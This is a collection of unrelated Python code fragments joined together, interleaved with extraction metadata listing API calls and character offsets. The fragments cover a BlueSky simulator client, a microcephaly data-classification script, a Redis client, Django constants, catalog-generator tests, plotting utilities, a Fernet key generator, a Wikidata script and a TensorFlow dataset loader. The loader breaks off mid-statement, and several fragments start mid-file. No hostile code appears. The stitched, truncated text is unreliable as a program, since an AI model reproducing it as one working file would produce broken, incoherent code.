_BS_MIN_VERSION = os.getenv("BS_MIN_VERSION")
if not _BS_MIN_VERSION:
raise ValueError("The BS_MIN_VERSION environment variable must be set")
MIN_SIM_VERSION = VersionInfo.parse(_BS_MIN_VERSION)
# TODO Check cases where we need this
def _assert_valid_args(args: list):
"""
Since BlueSky only accepts commands in the form of (variable-length) strings, we
need to check the arguments for each command string we construct before sending it
"""
# Probably a cleaner way of doing this...
assert all(
x and not x.isspace() and x != "None" for x in map(str, args)
), f"Invalid argument in : {args}"
class SimClient(AbstractSimClient):
"""AbstractSimClient implementation for BlueSky"""
@property
def aircraft(self) -> BlueSkyAircraftControls:
return self._aircraft_controls
@property
def simulation(self) -> BlueSkySimulatorControls:
return self._sim_controls
@property
def sim_version(self) -> VersionInfo:
return self._client.host_version
def __init__(self, **kwargs):
self._client = BlueSkyClient()
self._aircraft_controls = BlueSkyAircraftControls(self._client)
self._sim_controls = BlueSkySimulatorControls(self._client)
def start_timers(self) -> List[Timer]:
return self._client.start_timers()
def connect(self, timeout=1) -> None:
self._client.connect(
Settings.SIM_HOST,
event_port=Settings.BS_EVENT_PORT,
stream_port=Settings.BS_STREAM_PORT,
timeout=timeout,
)
def shutdown(self, shutdown_sim: bool = False) -> bool:
self._client.stop()
return True
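# Lifecycle sketch (assumption, not in the original module): a caller would typically
# drive the client with the methods defined above:
#     sim_client = SimClient()
#     sim_client.connect(timeout=5)
#     timers = sim_client.start_timers()
#     ...                                # use sim_client.aircraft / sim_client.simulation
#     sim_client.shutdown()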
| [
"bluebird.sim_client.bluesky.bluesky_client.BlueSkyClient",
"os.getenv",
"semver.VersionInfo.parse"
] | [((548, 575), 'os.getenv', 'os.getenv', (['"""BS_MIN_VERSION"""'], {}), "('BS_MIN_VERSION')\n", (557, 575), False, 'import os\n'), ((695, 729), 'semver.VersionInfo.parse', 'VersionInfo.parse', (['_BS_MIN_VERSION'], {}), '(_BS_MIN_VERSION)\n', (712, 729), False, 'from semver import VersionInfo\n'), ((1623, 1638), 'bluebird.sim_client.bluesky.bluesky_client.BlueSkyClient', 'BlueSkyClient', ([], {}), '()\n', (1636, 1638), False, 'from bluebird.sim_client.bluesky.bluesky_client import BlueSkyClient\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 27 08:49:21 2020
@author: rafae
"""
import pandas as pd
import numpy as np
def gerarbanco():
banco = pd.read_stata("Microcefalia MS analysis 20160609.dta")
circ = pd.read_csv("circumference.csv",sep=";",index_col='sem')
banco.index = range(len(banco.index))
bancoNovo = pd.DataFrame()
banco.NV_USG_RESULT.replace( ['ALTERADO','NORMAL'],['Alterado','Normal'],inplace=True)
# rule classification
sexo = banco.TP_SEXO
classFinal = pd.Series([np.nan]*len(sexo))
classFinal[banco.NV_CMV=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_HCV=='Reagente'] = 'Discarded'
classFinal[banco.NV_RUBEOLA=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_TOXO=='IgM reagente'] = 'Discarded'
classFinal[banco.NV_RM_RESULT=='Normal'] = 'Discarded'
classFinal[banco.NV_TC_RESULT=='Normal'] = 'Discarded'
classFinal[banco.NV_ZIKA=='Positivo'] = 'Definite'
# organize database
tamanhoCabe = banco.headcirc
bancoNovo['sexo'] = list(sexo)
bancoNovo['tamanhoCabe'] = list(tamanhoCabe)
bancoNovo['classFeto'] = list(banco.TP_CLASSIFICACAO_FETO_RN)
semanaGes = banco.SINASC_SEMAGESTAC
missing = pd.Series([np.nan]*len(sexo))
missing[bancoNovo.tamanhoCabe.isnull()]=1
missing[sexo.isnull()]=1
missing[bancoNovo.classFeto.isnull()]=1
missing[semanaGes.isnull()]=1
micro = pd.Series([np.nan]*len(sexo))
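    # Microcephaly flag: 1 if the head circumference is below the sex-specific minimum
    # reference for the gestational week (weeks 14-42), 0 otherwise; left as NaN when
    # any required field is missing.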
for i in range(len(sexo)):
if missing[i]!=1:
if semanaGes[i]<=42 and semanaGes[i]>=14:
ref1 =0
if sexo[i]=='Masculino':
ref1 = circ.boy_min[semanaGes[i]]
else:
ref1 = circ.girl_min[semanaGes[i]]
if tamanhoCabe[i]<ref1:
micro[i]=1
else:
micro[i]=0
bancoNovo['micro'] = list(micro)
banco['micro']=micro
bancoNovo['NV_TC_MICRO'] = list(banco.NV_TC_MICRO)
    # serology
bancoNovo['NV_Storch'] =list(banco.lab_STORCH)
bancoNovo['NV_sifilis'] = list(banco.NV_SIFILIS)
bancoNovo['NV_TOXO'] = list(banco.NV_TOXO.replace(['IgG reagente','IgM reagente'],['Reagente','Reagente']))
bancoNovo['NV_CMV'] =list( banco.NV_CMV)
bancoNovo['NV_DENGUE']=list(banco.NV_DENGUE.replace(['IgG reagente','IgM reagente'],['Reagente','Reagente']))
bancoNovo['NV_CHIK']=list(banco.NV_CHIK)
count_storch = pd.Series([np.nan]*len(sexo))
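    # Count how many STORCH serologies (syphilis, CMV, toxoplasmosis) have a non-empty
    # result for each record.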
for i in range(len(sexo)):
if len(bancoNovo.NV_sifilis[i].strip())>1:
count_storch[i]=1
if len(bancoNovo.NV_CMV[i].strip())>1:
if count_storch.isnull()[i]:
count_storch[i]=1
else:
count_storch[i]=count_storch[i]+1
if len(bancoNovo.NV_TOXO[i].strip())>1:
if count_storch.isnull()[i]:
count_storch[i]=1
else:
count_storch[i]=count_storch[i]+1
banco['count_storch'] = count_storch
bancoNovo['count_storch'] = list(count_storch)
    # imaging exams
bancoNovo['NV_USG_MICRO']=list(banco.NV_USG_MICRO)
bancoNovo['NV_TC_MICRO']=list(banco.NV_TC_MICRO)
bancoNovo['NV_RM_MICRO']=list(banco.NV_RM_MICRO)
bancoNovo['NV_USG_RESULT']=list(banco.NV_USG_RESULT)
bancoNovo['NV_TC_RESULT']=list(banco.NV_TC_RESULT)
bancoNovo['NV_RM_RESULT']=list(banco.NV_TC_RESULT)
texto = banco.NV_RM_CALC
texto = texto + ' ' + banco.NV_USG_CALC_DESC
texto = texto + ' ' + banco.NV_RM_CALC
texto = texto + ' ' + banco.NV_TC_CALC
texto = texto + ' ' + banco.NV_USG_OUTRO
texto = texto + ' ' + banco.NV_TC_OUTRO
texto = texto + ' ' + banco.NV_RM_OUTRO
texto = texto + ' ' + banco.NV_USG_VENTR
texto = texto + ' ' + banco.NV_TC_VENTR
texto = texto + ' ' + banco.NV_RM_VENTR
missImagem = pd.Series([np.nan]*len(sexo))
for i in range(len(sexo)):
if len(banco.NV_USG_RESULT[i].strip())<2 and len(banco.NV_TC_RESULT[i].strip())<2 and len(banco.NV_RM_RESULT[i].strip())<2 and len(texto[i].strip())<2:
missImagem[i] = 1
else:
missImagem[i] = 0
texto = texto + ' ' + banco.DS_OBSERVACOES_GERAIS
for i in range(len(texto)):
texto[i] = texto[i].strip().replace('.',' ').replace(';',' ').replace(',',' ').replace('?',' ').replace("'",' ').replace('=','').replace('-',' ').replace('+',' ').replace('/',' ').replace('(',' ').replace(')',' ').replace('<',' ').replace('>',' ').replace(':',' ').replace('&',' ').replace('¿',' ').replace('%',' ').replace('\n',' ').replace('"',' ').lower()
bancoNovo['missImagem'] = list(missImagem)
bancoNovo['casegr'] = list(banco.casegr)
bancoNovo['classFinal']=list(classFinal)
return texto,bancoNovo
texto,bancoNovo = gerarbanco()
bancoNovo['texto'] = list(texto)
# type class and save
typeClass= pd.Series([np.nan]*len(bancoNovo))
typeClass[bancoNovo.classFinal.isnull()==False]='rule'
typeClass[(typeClass.isnull()) & (bancoNovo.texto.str.strip()!='')]='group2'
typeClass[typeClass.isnull()]='group1'
bancoNovo['typeClass']=list(typeClass)
bancoNovo.to_csv('banco_total.csv') | [
"pandas.read_csv",
"pandas.DataFrame",
"pandas.read_stata"
] | [((170, 224), 'pandas.read_stata', 'pd.read_stata', (['"""Microcefalia MS analysis 20160609.dta"""'], {}), "('Microcefalia MS analysis 20160609.dta')\n", (183, 224), True, 'import pandas as pd\n'), ((237, 295), 'pandas.read_csv', 'pd.read_csv', (['"""circumference.csv"""'], {'sep': '""";"""', 'index_col': '"""sem"""'}), "('circumference.csv', sep=';', index_col='sem')\n", (248, 295), True, 'import pandas as pd\n'), ((355, 369), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (367, 369), True, 'import pandas as pd\n')] |
from redis import StrictRedis
class SentinelClient(object):
def __init__(self, url, db=None, name='default', health_check_interval=30):
"""create a redis client.
Args:
url: redis server url.
db: redis database, default 0.
name: client name, default 'default'.
health_check_interval: how many seconds to check whether the redis server is healthy.
"""
self.client = StrictRedis.from_url(
url=url,
db=db,
client_name=name,
health_check_interval=health_check_interval,
decode_responses=True
)
if __name__ == '__main__':
_client = SentinelClient(url='redis://localhost:26379')
_pub_sub = _client.client.pubsub()
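    # Pattern-subscribe to every channel ('*') and print each pub/sub event as it arrives.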
_pub_sub.psubscribe('*')
for i in _pub_sub.listen():
print(i)
| [
"redis.StrictRedis.from_url"
] | [((452, 578), 'redis.StrictRedis.from_url', 'StrictRedis.from_url', ([], {'url': 'url', 'db': 'db', 'client_name': 'name', 'health_check_interval': 'health_check_interval', 'decode_responses': '(True)'}), '(url=url, db=db, client_name=name,\n health_check_interval=health_check_interval, decode_responses=True)\n', (472, 578), False, 'from redis import StrictRedis\n')] |
from django.utils.translation import ugettext_lazy as _
MALE = "m"
FEMALE = "f"
UNSPECIFIED = "-"
GENDERS = {(MALE, _("male")),
(FEMALE, _("female")),
(UNSPECIFIED, _("don't want to answer"))}
| [
"django.utils.translation.ugettext_lazy"
] | [((117, 126), 'django.utils.translation.ugettext_lazy', '_', (['"""male"""'], {}), "('male')\n", (118, 126), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((149, 160), 'django.utils.translation.ugettext_lazy', '_', (['"""female"""'], {}), "('female')\n", (150, 160), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((188, 213), 'django.utils.translation.ugettext_lazy', '_', (['"""don\'t want to answer"""'], {}), '("don\'t want to answer")\n', (189, 213), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import os
import logging
import unittest
from Uefi.Capsule.CatGenerator import *
#must run from build env or set PYTHONPATH env variable to point to the PythonLibrary folder
class CatGeneratorTest(unittest.TestCase):
def test_win10_OS(self):
o = CatGenerator("x64", "win10")
self.assertEqual(o.OperatingSystem, "10")
def test_10_OS(self):
o = CatGenerator("x64", "10")
self.assertEqual(o.OperatingSystem, "10")
def test_win10Server_OS(self):
o = CatGenerator("x64", "Server10")
self.assertEqual(o.OperatingSystem, "Server10")
def test_invalid_OS(self):
with self.assertRaises(ValueError):
CatGenerator("x64", "Invalid Junk")
def test_x64_arch(self):
o = CatGenerator("x64", "win10")
self.assertEqual(o.Arch, "X64")
def test_amd64_arch(self):
o = CatGenerator("amd64", "win10")
self.assertEqual(o.Arch, "X64")
def test_arm_arch(self):
o = CatGenerator("arm", "win10")
self.assertEqual(o.Arch, "ARM")
def test_arm64_arch(self):
o = CatGenerator("arm64", "win10")
self.assertEqual(o.Arch, "ARM64")
def test_aarch64_arch(self):
o = CatGenerator("aarch64", "win10")
self.assertEqual(o.Arch, "ARM64")
def test_invalid_arch(self):
with self.assertRaises(ValueError):
CatGenerator("Invalid Arch", "win10")
def test_invalid_pathtotool(self):
o = CatGenerator("amd64", "10")
with self.assertRaises(Exception) as cm:
o.MakeCat("garbage", os.path.join("c:", "test", "badpath", "inf2cat.exe"))
self.assertTrue(str(cm.exception).startswith("Can't find Inf2Cat on this machine."))
| [
"os.path.join"
] | [((1463, 1515), 'os.path.join', 'os.path.join', (['"""c:"""', '"""test"""', '"""badpath"""', '"""inf2cat.exe"""'], {}), "('c:', 'test', 'badpath', 'inf2cat.exe')\n", (1475, 1515), False, 'import os\n')] |
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple, Union, TypeVar, Iterable, Dict
from goa import problems
T = TypeVar("T")
def plot_population(
problem: problems.BaseProblem,
X: Union[T, Iterable[T]],
ax: plt.Axes = None,
c: str = "darkblue",
linestyle: str = ":",
marker: str = "X",
markersize: int = 6,
markevery: int = 2,
antialiased: bool = True,
figsize: Tuple[float, float] = (12, 8),
kwargs: Dict = None,
) -> plt.Axes:
knobs = dict()
if kwargs is not None:
knobs.update(kwargs)
if not ax:
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(projection="3d")
if X.shape == (2,):
X = [X]
for x, y in X:
ax.plot(
[x, x],
[y, y],
[problem(np.asarray([x, y])), 0],
c=c,
linestyle=linestyle,
marker=marker,
markersize=markersize,
markevery=markevery,
antialiased=antialiased,
**knobs
)
return ax
def root_mean_squared_error(
x: Union[float, np.ndarray], y: Union[float, np.ndarray]
) -> float:
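    """Root-mean-squared error: sqrt(mean((x - y) ** 2)); accepts scalars or arrays."""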
return np.sqrt(np.mean(np.power(np.subtract(x, y), 2)))
def custom_init_view_function(
y: float = 20, x: float = 120, a: float = 30, b: float = 15
) -> Tuple[float, float]:
return a - np.cos(y) * b, x
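# Usage sketch (assumption, not part of the original module; `problem` stands for any
# goa.problems.BaseProblem instance already constructed by the caller):
#     X = np.random.uniform(-5.0, 5.0, size=(20, 2))   # population of 2-D candidates
#     ax = plot_population(problem, X)
#     plt.show()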
| [
"numpy.subtract",
"numpy.asarray",
"matplotlib.pyplot.figure",
"numpy.cos",
"typing.TypeVar"
] | [((141, 153), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (148, 153), False, 'from typing import Tuple, Union, TypeVar, Iterable, Dict\n'), ((608, 635), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (618, 635), True, 'import matplotlib.pyplot as plt\n'), ((1210, 1227), 'numpy.subtract', 'np.subtract', (['x', 'y'], {}), '(x, y)\n', (1221, 1227), True, 'import numpy as np\n'), ((1372, 1381), 'numpy.cos', 'np.cos', (['y'], {}), '(y)\n', (1378, 1381), True, 'import numpy as np\n'), ((819, 837), 'numpy.asarray', 'np.asarray', (['[x, y]'], {}), '([x, y])\n', (829, 837), True, 'import numpy as np\n')] |
# Standard library
import os
from pathlib import Path
# Third party
from cryptography.fernet import Fernet
from dotenv import load_dotenv
# Constants
CRYPTO_KEY_ENV_VAR = 'CRYPTO_KEY'
ENV_VAR_EXIST = f'The {CRYPTO_KEY_ENV_VAR} environment variable already exists. Cannot continue as the crypto key may still be in use.'
ENV_VAR_PATH = Path.home() / '.my_python_env'
# Load virtual environmental variables
load_dotenv(dotenv_path=ENV_VAR_PATH)
def environment_var_exist():
return os.environ.get(CRYPTO_KEY_ENV_VAR)
def generate_key():
return Fernet.generate_key()
def write_key_env_var(crypto_key):
# Only write if environmental variable does not exist.
# Otherwise raise an exception - environment variable already exists.
if not environment_var_exist():
with ENV_VAR_PATH.open(mode='w') as file:
file.write(f'{CRYPTO_KEY_ENV_VAR}={crypto_key}')
else:
raise Exception(ENV_VAR_EXIST)
if __name__ == '__main__':
crypto_key = generate_key().decode()
write_key_env_var(crypto_key)
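# Consumption sketch (assumption, not part of this script): a later process would
# reload the dotenv file and use the stored key roughly like this:
#     load_dotenv(dotenv_path=ENV_VAR_PATH)
#     fernet = Fernet(os.environ[CRYPTO_KEY_ENV_VAR].encode())
#     token = fernet.encrypt(b'secret data')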
| [
"dotenv.load_dotenv",
"os.environ.get",
"cryptography.fernet.Fernet.generate_key",
"pathlib.Path.home"
] | [((408, 445), 'dotenv.load_dotenv', 'load_dotenv', ([], {'dotenv_path': 'ENV_VAR_PATH'}), '(dotenv_path=ENV_VAR_PATH)\n', (419, 445), False, 'from dotenv import load_dotenv\n'), ((337, 348), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (346, 348), False, 'from pathlib import Path\n'), ((487, 521), 'os.environ.get', 'os.environ.get', (['CRYPTO_KEY_ENV_VAR'], {}), '(CRYPTO_KEY_ENV_VAR)\n', (501, 521), False, 'import os\n'), ((554, 575), 'cryptography.fernet.Fernet.generate_key', 'Fernet.generate_key', ([], {}), '()\n', (573, 575), False, 'from cryptography.fernet import Fernet\n')] |
import csv
import config
import awb
infilename = config.datafolder+'wikidata/wdlid_ElhId.csv'
resourceitem = "Q19" #Q19: Elhuyar
#positem = "Q8" # Q7: substantibo, Q8: aditza
with open(infilename, encoding="utf-8") as csvfile:
sourcedict = csv.DictReader(csvfile)
lex_elh = {}
for row in sourcedict:
lex_elh[row['lexemeId'].replace("http://www.wikidata.org/entity/","")] = row['ElhId']
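# For each local id that is a lexeme ('L...') whose mapped Wikidata id has an Elhuyar
# match, store the Wikidata id as a string claim under property P1 and attach the
# Elhuyar id as a P7 qualifier.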
for awbid in awb.wdmappings:
wdid = awb.wdmappings[awbid]
if awbid.startswith('L') and wdid in lex_elh:
wdstatement = awb.updateclaim(awbid, "P1", wdid, "string")
quali = awb.setqualifier(awbid, "P1", wdstatement, "P7", lex_elh[wdid], "string")
| [
"csv.DictReader",
"awb.updateclaim",
"awb.setqualifier"
] | [((243, 266), 'csv.DictReader', 'csv.DictReader', (['csvfile'], {}), '(csvfile)\n', (257, 266), False, 'import csv\n'), ((516, 560), 'awb.updateclaim', 'awb.updateclaim', (['awbid', '"""P1"""', 'wdid', '"""string"""'], {}), "(awbid, 'P1', wdid, 'string')\n", (531, 560), False, 'import awb\n'), ((571, 644), 'awb.setqualifier', 'awb.setqualifier', (['awbid', '"""P1"""', 'wdstatement', '"""P7"""', 'lex_elh[wdid]', '"""string"""'], {}), "(awbid, 'P1', wdstatement, 'P7', lex_elh[wdid], 'string')\n", (587, 644), False, 'import awb\n')] |
import numpy as np
from casim.calculations import word_entropy
def test_word_entropy():
test_arr = np.array([1, 0, 0, 1, 1, 0, 1, 0])
assert np.round(word_entropy(test_arr, 3), decimals=1) == 2.5
| [
"casim.calculations.word_entropy",
"numpy.array"
] | [((105, 139), 'numpy.array', 'np.array', (['[1, 0, 0, 1, 1, 0, 1, 0]'], {}), '([1, 0, 0, 1, 1, 0, 1, 0])\n', (113, 139), True, 'import numpy as np\n'), ((161, 186), 'casim.calculations.word_entropy', 'word_entropy', (['test_arr', '(3)'], {}), '(test_arr, 3)\n', (173, 186), False, 'from casim.calculations import word_entropy\n')] |
import numpy as np
import matplotlib.pyplot as plt
import glob
from sys import argv
from os.path import exists as file_exists
methods = ['drude', 'c36']
mol1, mol2 = str(argv[1]), str(argv[2])
sysname = mol1+'_'+mol2
def blockavg(x,nblocks=30):
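    """Split x into nblocks consecutive blocks; return the mean and the standard
    deviation of the per-block means (a simple error estimate for correlated data)."""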
lblock = int(len(x)/nblocks)
m = []
for i in range(nblocks):
start = i*lblock
end = (i+1)*lblock
m.append(np.mean(x[start:end]))
m = np.array(m)
return np.mean(m), np.std(m)
for method in methods:
dirs = sorted(glob.glob('%s_at_*'%(method)))
if len(dirs) == 0:
continue
print(method.upper(),':',mol1.upper(),'-',mol2.upper())
osmp = []
f = open('OSMP_%s_%s_%s.dat'%(mol1,mol2,method), 'w')
f.write('# %8s %10s %10s\n'%('Conc (M)','OsmP (bar)','Error'))
print('# %8s %10s %10s'%('Conc (M)','OsmP (bar)','Error'))
for d in dirs:
c = d.split("_")[2]
r1 = np.loadtxt('%s/osmp.%s_%s_%s.1.dat'%(d,mol1,mol2,c))
r2 = np.loadtxt('%s/osmp.%s_%s_%s.2.dat'%(d,mol1,mol2,c))
r3 = np.loadtxt('%s/osmp.%s_%s_%s.3.dat'%(d,mol1,mol2,c))
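        # Pool the three replica time series; only column 1 (the osmotic pressure) is
        # used below. The 1e5 divisor is assumed to convert the raw values from Pa to bar.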
r = np.concatenate((r1,r2,r3))/100000.0
m,s = blockavg(r[:,1])
print("%10.1f %10.3f %10.3f"%(float(c),m,s))
f.write("%10.1f %10.3f %10.3f\n"%(float(c),m,s))
osmp.append((float(c),m,s))
osmp = np.array(osmp)
f.close()
# plot
plt.figure()
plt.title(method.upper()+': '+mol1.upper()+' - '+mol2.upper())
plt.errorbar(osmp[:,0],osmp[:,1],yerr=osmp[:,2],marker='o',markersize=5,capsize=3)
plt.xlabel('Concentration (M)')
plt.ylabel('Osmotic Pressure (bar)')
plt.tight_layout()
plt.savefig('OSMP_%s_%s_%s.png'%(mol1,mol2,method))
plt.close()
if file_exists('OSMP_%s_%s_drude.dat'%(mol1,mol2)) and file_exists('OSMP_%s_%s_c36.dat'%(mol1,mol2)):
osmp_drude = np.loadtxt('OSMP_%s_%s_drude.dat'%(mol1,mol2))
osmp_c36 = np.loadtxt('OSMP_%s_%s_c36.dat'%(mol1,mol2))
plt.figure()
plt.title(mol1.upper()+' - '+mol2.upper())
plt.errorbar(osmp_drude[:,0],osmp_drude[:,1],yerr=osmp_drude[:,2],marker='o',markersize=5,capsize=3,label='drude')
plt.errorbar(osmp_c36[:,0],osmp_c36[:,1],yerr=osmp_c36[:,2],marker='o',markersize=5,capsize=3,label='c36')
plt.xlabel('Concentration (M)')
plt.ylabel('Osmotic Pressure (bar)')
plt.legend()
plt.tight_layout()
plt.savefig('OSMP_%s_%s_both.png'%(mol1,mol2))
plt.close()
| [
"matplotlib.pyplot.savefig",
"numpy.concatenate",
"numpy.std",
"matplotlib.pyplot.close",
"matplotlib.pyplot.legend",
"os.path.exists",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.array",
"numpy.loadtxt",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.errorbar"
] | [((420, 431), 'numpy.array', 'np.array', (['m'], {}), '(m)\n', (428, 431), True, 'import numpy as np\n'), ((1330, 1344), 'numpy.array', 'np.array', (['osmp'], {}), '(osmp)\n', (1338, 1344), True, 'import numpy as np\n'), ((1374, 1386), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1384, 1386), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1552), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp[:, 0]', 'osmp[:, 1]'], {'yerr': 'osmp[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)'}), "(osmp[:, 0], osmp[:, 1], yerr=osmp[:, 2], marker='o',\n markersize=5, capsize=3)\n", (1470, 1552), True, 'import matplotlib.pyplot as plt\n'), ((1545, 1576), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Concentration (M)"""'], {}), "('Concentration (M)')\n", (1555, 1576), True, 'import matplotlib.pyplot as plt\n'), ((1581, 1617), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Osmotic Pressure (bar)"""'], {}), "('Osmotic Pressure (bar)')\n", (1591, 1617), True, 'import matplotlib.pyplot as plt\n'), ((1622, 1640), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1638, 1640), True, 'import matplotlib.pyplot as plt\n'), ((1645, 1700), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('OSMP_%s_%s_%s.png' % (mol1, mol2, method))"], {}), "('OSMP_%s_%s_%s.png' % (mol1, mol2, method))\n", (1656, 1700), True, 'import matplotlib.pyplot as plt\n'), ((1701, 1712), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (1710, 1712), True, 'import matplotlib.pyplot as plt\n'), ((1717, 1767), 'os.path.exists', 'file_exists', (["('OSMP_%s_%s_drude.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_drude.dat' % (mol1, mol2))\n", (1728, 1767), True, 'from os.path import exists as file_exists\n'), ((1769, 1817), 'os.path.exists', 'file_exists', (["('OSMP_%s_%s_c36.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_c36.dat' % (mol1, mol2))\n", (1780, 1817), True, 'from os.path import exists as file_exists\n'), ((1833, 1882), 'numpy.loadtxt', 'np.loadtxt', (["('OSMP_%s_%s_drude.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_drude.dat' % (mol1, mol2))\n", (1843, 1882), True, 'import numpy as np\n'), ((1895, 1942), 'numpy.loadtxt', 'np.loadtxt', (["('OSMP_%s_%s_c36.dat' % (mol1, mol2))"], {}), "('OSMP_%s_%s_c36.dat' % (mol1, mol2))\n", (1905, 1942), True, 'import numpy as np\n'), ((1944, 1956), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1954, 1956), True, 'import matplotlib.pyplot as plt\n'), ((2008, 2135), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp_drude[:, 0]', 'osmp_drude[:, 1]'], {'yerr': 'osmp_drude[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)', 'label': '"""drude"""'}), "(osmp_drude[:, 0], osmp_drude[:, 1], yerr=osmp_drude[:, 2],\n marker='o', markersize=5, capsize=3, label='drude')\n", (2020, 2135), True, 'import matplotlib.pyplot as plt\n'), ((2127, 2247), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['osmp_c36[:, 0]', 'osmp_c36[:, 1]'], {'yerr': 'osmp_c36[:, 2]', 'marker': '"""o"""', 'markersize': '(5)', 'capsize': '(3)', 'label': '"""c36"""'}), "(osmp_c36[:, 0], osmp_c36[:, 1], yerr=osmp_c36[:, 2], marker=\n 'o', markersize=5, capsize=3, label='c36')\n", (2139, 2247), True, 'import matplotlib.pyplot as plt\n'), ((2238, 2269), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Concentration (M)"""'], {}), "('Concentration (M)')\n", (2248, 2269), True, 'import matplotlib.pyplot as plt\n'), ((2274, 2310), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Osmotic Pressure (bar)"""'], {}), "('Osmotic Pressure (bar)')\n", (2284, 
2310), True, 'import matplotlib.pyplot as plt\n'), ((2315, 2327), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2325, 2327), True, 'import matplotlib.pyplot as plt\n'), ((2332, 2350), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2348, 2350), True, 'import matplotlib.pyplot as plt\n'), ((2355, 2404), 'matplotlib.pyplot.savefig', 'plt.savefig', (["('OSMP_%s_%s_both.png' % (mol1, mol2))"], {}), "('OSMP_%s_%s_both.png' % (mol1, mol2))\n", (2366, 2404), True, 'import matplotlib.pyplot as plt\n'), ((2406, 2417), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2415, 2417), True, 'import matplotlib.pyplot as plt\n'), ((443, 453), 'numpy.mean', 'np.mean', (['m'], {}), '(m)\n', (450, 453), True, 'import numpy as np\n'), ((455, 464), 'numpy.std', 'np.std', (['m'], {}), '(m)\n', (461, 464), True, 'import numpy as np\n'), ((507, 536), 'glob.glob', 'glob.glob', (["('%s_at_*' % method)"], {}), "('%s_at_*' % method)\n", (516, 536), False, 'import glob\n'), ((900, 957), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.1.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.1.dat' % (d, mol1, mol2, c))\n", (910, 957), True, 'import numpy as np\n'), ((966, 1023), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.2.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.2.dat' % (d, mol1, mol2, c))\n", (976, 1023), True, 'import numpy as np\n'), ((1032, 1089), 'numpy.loadtxt', 'np.loadtxt', (["('%s/osmp.%s_%s_%s.3.dat' % (d, mol1, mol2, c))"], {}), "('%s/osmp.%s_%s_%s.3.dat' % (d, mol1, mol2, c))\n", (1042, 1089), True, 'import numpy as np\n'), ((389, 410), 'numpy.mean', 'np.mean', (['x[start:end]'], {}), '(x[start:end])\n', (396, 410), True, 'import numpy as np\n'), ((1101, 1129), 'numpy.concatenate', 'np.concatenate', (['(r1, r2, r3)'], {}), '((r1, r2, r3))\n', (1115, 1129), True, 'import numpy as np\n')] |
# Copyright 2022 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataset creation for frame interpolation."""
from typing import Callable, Dict, List, Optional
from absl import logging
import gin.tf
import tensorflow as tf
def _create_feature_map() -> Dict[str, tf.io.FixedLenFeature]:
"""Creates the feature map for extracting the frame triplet."""
feature_map = {
'frame_0/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_0/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_0/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_0/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_1/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_1/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_1/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/encoded':
tf.io.FixedLenFeature((), tf.string, default_value=''),
'frame_2/format':
tf.io.FixedLenFeature((), tf.string, default_value='jpg'),
'frame_2/height':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'frame_2/width':
tf.io.FixedLenFeature((), tf.int64, default_value=0),
'path':
tf.io.FixedLenFeature((), tf.string, default_value=''),
}
return feature_map
def _parse_example(sample):
"""Parses a serialized sample.
Args:
sample: A serialized tf.Example to be parsed.
Returns:
dictionary containing the following:
encoded_image
image_height
image_width
"""
feature_map = _create_feature_map()
features = tf.io.parse_single_example(sample, feature_map)
output_dict = {
'x0': tf.io.decode_image(features['frame_0/encoded'], dtype=tf.float32),
